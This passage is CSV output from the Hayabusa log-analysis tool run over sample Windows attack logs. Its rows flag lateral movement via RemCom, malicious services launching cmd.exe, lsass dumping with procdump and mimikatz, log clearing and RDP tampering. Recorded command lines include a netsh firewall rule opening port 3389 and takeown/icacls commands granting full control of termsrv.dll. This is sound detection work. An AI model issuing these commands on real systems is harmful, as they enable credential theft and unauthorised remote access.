127.0.0.1:5357 (PC01.example.corp) | Dst: 127.0.0.1:49189 (PC01.example.corp) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:38.843 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3820 | PGUID: 
365ABB72-E0AE-5C67-0000-0010C9B81700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 17:54:26.956 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 17:54:26.956 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 17:55:47.181 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 17:55:47.181 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 17:57:41.475 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | 
Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 17:57:41.475 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.522 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | 
LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-03-03 09:20:28.621 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 09:20:28.621 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 09:20:28.621 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolfool | Path: cmd.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 09:24:24.699 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 09:24:24.699 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 09:24:24.699 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service 
Possibly Installed,Svc: spoolsv | Path: cmd.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-17 19:09:41.328 +00:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\procdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1856 | Src PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:09:41.328 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.exe_190317_120941.dmp | Process: C:\Users\IEUser\Desktop\procdump.exe | PID: 1856 | PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:09:41.328 +00:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/file_event_win_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:09:41.328 +00:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:09:41.328 +00:00,PC04.example.corp,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:10:03.991 +00:00,PC04.example.corp,10,low,,Process Access,Src Process: 
C:\Windows\system32\taskmgr.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3576 | Src PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:10:03.991 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\lsass (2).DMP | Process: C:\Windows\system32\taskmgr.exe | PID: 3576 | PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:10:03.991 +00:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/file_event_win_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:10:03.991 +00:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:26:42.116 +00:00,PC04.example.corp,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx +2019-03-17 19:37:11.661 +00:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\mimikatz_trunk\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 3588 | Src PGUID: 365ABB72-A1E3-5C8E-0000-0010CEF72200 | Tgt PID: 476 | Tgt PGUID: 
365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-17 19:37:11.661 +00:00,PC04.example.corp,10,medium,CredAccess,Rare GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_rare_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-17 20:17:44.537 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\install.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:44.637 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPCheck.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:44.637 +00:00,PC04.example.corp,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:44.797 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPConf.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:44.797 +00:00,PC04.example.corp,11,low,ResDev,Creation of an Executable by an 
Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:45.478 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPWInst.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:45.478 +00:00,PC04.example.corp,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:45.628 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\uninstall.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:45.648 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\update.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:52.949 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | Process: C:\Windows\System32\cmd.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 3272 | PGUID: 365ABB72-AB70-5C8E-0000-0010781D0A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:52.979 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | Process: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe | User: PC04\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | LID: 0x3c004 | PID: 3700 | PGUID: 365ABB72-AB70-5C8E-0000-0010DF1F0A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:52.979 +00:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:05.086 +00:00,PC04.example.corp,13,medium,Persis | PrivEsc,ServiceDll Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_set_servicedll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:05.086 +00:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,rules/sigma/registry_sysmon/registry_set/registry_set_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:09.282 +00:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,rules/sigma/registry_sysmon/registry_set/registry_set_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:09.282 +00:00,PC04.example.corp,13,high,Evas,RDP Registry Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:09.312 
+00:00,PC04.example.corp,1,info,,Process Created,"Cmd: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow | Process: C:\Windows\System32\netsh.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | LID: 0x3c004 | PID: 3696 | PGUID: 365ABB72-AB81-5C8E-0000-001024960C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:09.312 +00:00,PC04.example.corp,1,medium,Evas,Netsh Port or Application Allowed,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:09.312 +00:00,PC04.example.corp,1,high,Evas,Netsh RDP Port Opening,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:09.643 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3892 | PGUID: 365ABB72-AB81-5C8E-0000-00102E9E0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:12.096 +00:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 600 | PGUID: 365ABB72-AB84-5C8E-0000-00109EAD0C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:14.512 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | Process: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 4024 | PGUID: 365ABB72-ABFE-5C8E-0000-00105A560D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:14.512 +00:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:17.907 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll | Process: C:\Windows\System32\takeown.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3708 | PGUID: 365ABB72-AC01-5C8E-0000-001011690D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:17.917 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3536 | PGUID: 
365ABB72-AC01-5C8E-0000-0010296C0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:17.917 +00:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,rules/sigma/process_creation_sysmon/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:17.927 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3652 | PGUID: 365ABB72-AC01-5C8E-0000-0010656E0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:17.927 +00:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,rules/sigma/process_creation_sysmon/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:22:59.399 +00:00,PC04.example.corp,13,high,Persis,Changing RDP Port to Non Standard Number,,rules/sigma/registry_sysmon/registry_set/registry_set_change_rdp_port.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:23:12.188 +00:00,PC04.example.corp,1,info,,Process 